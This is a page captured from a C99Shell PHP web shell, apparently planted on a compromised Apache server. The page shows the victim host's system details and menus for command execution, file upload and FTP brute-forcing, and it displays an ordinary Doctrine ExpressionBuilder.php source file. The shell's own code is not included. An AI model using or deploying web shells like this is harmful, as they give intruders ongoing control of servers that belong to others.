!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/doctrine/collections/lib/Doctrine/Common/Collections/   drwxrwxrwx
Free 13.23 GB of 57.97 GB (22.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExpressionBuilder.php (3.93 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Doctrine\Common\Collections;

use 
Doctrine\Common\Collections\Expr\Comparison;
use 
Doctrine\Common\Collections\Expr\CompositeExpression;
use 
Doctrine\Common\Collections\Expr\Value;
use function 
func_get_args;

/**
 * Builder for Expressions in the {@link Selectable} interface.
 *
 * Important Notice for interoperable code: You have to use scalar
 * values only for comparisons, otherwise the behavior of the comparison
 * may be different between implementations (Array vs ORM vs ODM).
 */
class ExpressionBuilder
{
    
/**
     * @param mixed ...$x
     *
     * @return CompositeExpression
     */
    
public function andX($x null)
    {
        return new 
CompositeExpression(CompositeExpression::TYPE_ANDfunc_get_args());
    }

    
/**
     * @param mixed ...$x
     *
     * @return CompositeExpression
     */
    
public function orX($x null)
    {
        return new 
CompositeExpression(CompositeExpression::TYPE_ORfunc_get_args());
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function eq($field$value)
    {
        return new 
Comparison($fieldComparison::EQ, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function gt($field$value)
    {
        return new 
Comparison($fieldComparison::GT, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function lt($field$value)
    {
        return new 
Comparison($fieldComparison::LT, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function gte($field$value)
    {
        return new 
Comparison($fieldComparison::GTE, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function lte($field$value)
    {
        return new 
Comparison($fieldComparison::LTE, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function neq($field$value)
    {
        return new 
Comparison($fieldComparison::NEQ, new Value($value));
    }

    
/**
     * @param string $field
     *
     * @return Comparison
     */
    
public function isNull($field)
    {
        return new 
Comparison($fieldComparison::EQ, new Value(null));
    }

    
/**
     * @param string $field
     * @param array  $values
     *
     * @return Comparison
     */
    
public function in($field, array $values)
    {
        return new 
Comparison($fieldComparison::IN, new Value($values));
    }

    
/**
     * @param string $field
     * @param array  $values
     *
     * @return Comparison
     */
    
public function notIn($field, array $values)
    {
        return new 
Comparison($fieldComparison::NIN, new Value($values));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function contains($field$value)
    {
        return new 
Comparison($fieldComparison::CONTAINS, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function memberOf($field$value)
    {
        return new 
Comparison($fieldComparison::MEMBER_OF, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function startsWith($field$value)
    {
        return new 
Comparison($fieldComparison::STARTS_WITH, new Value($value));
    }

    
/**
     * @param string $field
     * @param mixed  $value
     *
     * @return Comparison
     */
    
public function endsWith($field$value)
    {
        return new 
Comparison($fieldComparison::ENDS_WITH, new Value($value));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0065 ]--